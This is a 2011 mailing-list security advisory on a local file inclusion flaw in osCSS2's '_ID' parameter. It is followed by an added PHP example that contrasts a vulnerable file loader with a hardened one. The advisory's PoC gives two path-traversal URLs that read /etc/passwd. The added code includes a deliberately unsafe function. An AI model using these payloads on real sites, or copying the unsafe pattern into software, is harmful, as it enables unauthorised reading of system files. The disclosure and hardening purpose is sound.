Open Source and information security mailing list archives
Message-ID: <1RO6QQ-0MLdRY0@fwd21.aul.t-online.de>
Date: Wed, 09 Nov 2011 12:34:38 +0100
From: "SSchurtz@...nline.de" <SSchurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: osCSS2 "_ID" parameter Local file inclusion

Advisory: osCSS2 "_ID" parameter Local file inclusion
Advisory ID: SSCHADV2011-034
Author: Stefan Schurtz
Affected Software: Successfully tested on osCSS2 2.1.0 (latest version)
Vendor URL: http://oscss.org/
Vendor Status: Fixed in svn branch 2.1.0 and reported in develop version 2.1.1

==========================
Vulnerability Description
==========================

The "_ID" parameter of osCSS2 2.1.0 is prone to a local file inclusion (LFI) vulnerability.

==================
PoC-Exploit
==================

http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd

=========
Solution
=========

Fixed in svn branch 2.1.0 and reported in develop version 2.1.1

====================
Disclosure Timeline
====================

08-Nov-2011 - informed vendor
08-Nov-2011 - release date of this security advisory
08-Nov-2011 - fixed by vendor
08-Nov-2011 - post on BugTraq

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
http://dev.oscss.org/task/892
http://www.rul3z.de/advisories/SSCHADV2011-034.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
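The advisory does not show the affected code, so the following is an added illustration, not osCSS2's own source or the vendor's fix: a hypothetical PHP content loader (directory name, parameter handling and file naming are assumptions) showing the path-building pattern behind this class of LFI next to a hardened version that allowlists the identifier and checks that the resolved path stays inside the content directory.

```php
<?php
// Added example, not code from osCSS2. CONTENT_DIR and the ".php"
// file naming are assumptions made for illustration only.

define('CONTENT_DIR', __DIR__ . '/content');

// Vulnerable pattern: the request parameter is spliced into a filesystem
// path, so "../" sequences can walk out of CONTENT_DIR.
function load_content_vulnerable(string $id): string|false
{
    return file_get_contents(CONTENT_DIR . '/' . $id . '.php');
}

// Hardened version: accept only a simple token, then confirm the
// canonical path still sits below CONTENT_DIR before reading it.
function load_content_safe(string $id): ?string
{
    // 1. Syntactic allowlist: letters, digits, '_' and '-' only; no
    //    separators, no dots, bounded length.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $id)) {
        return null;
    }

    // 2. Canonicalise and check containment. realpath() returns false
    //    for a missing file, which is treated the same as a bad path.
    $base = realpath(CONTENT_DIR);
    $path = realpath(CONTENT_DIR . '/' . $id . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return file_get_contents($path);
}

// Request handling: an invalid or out-of-tree "_ID" yields a plain 404
// rather than an error that reveals filesystem details.
$id   = (string) ($_GET['_ID'] ?? '');
$body = load_content_safe($id);
if ($body === null) {
    http_response_code(404);
    exit('Not found');
}
echo $body;
```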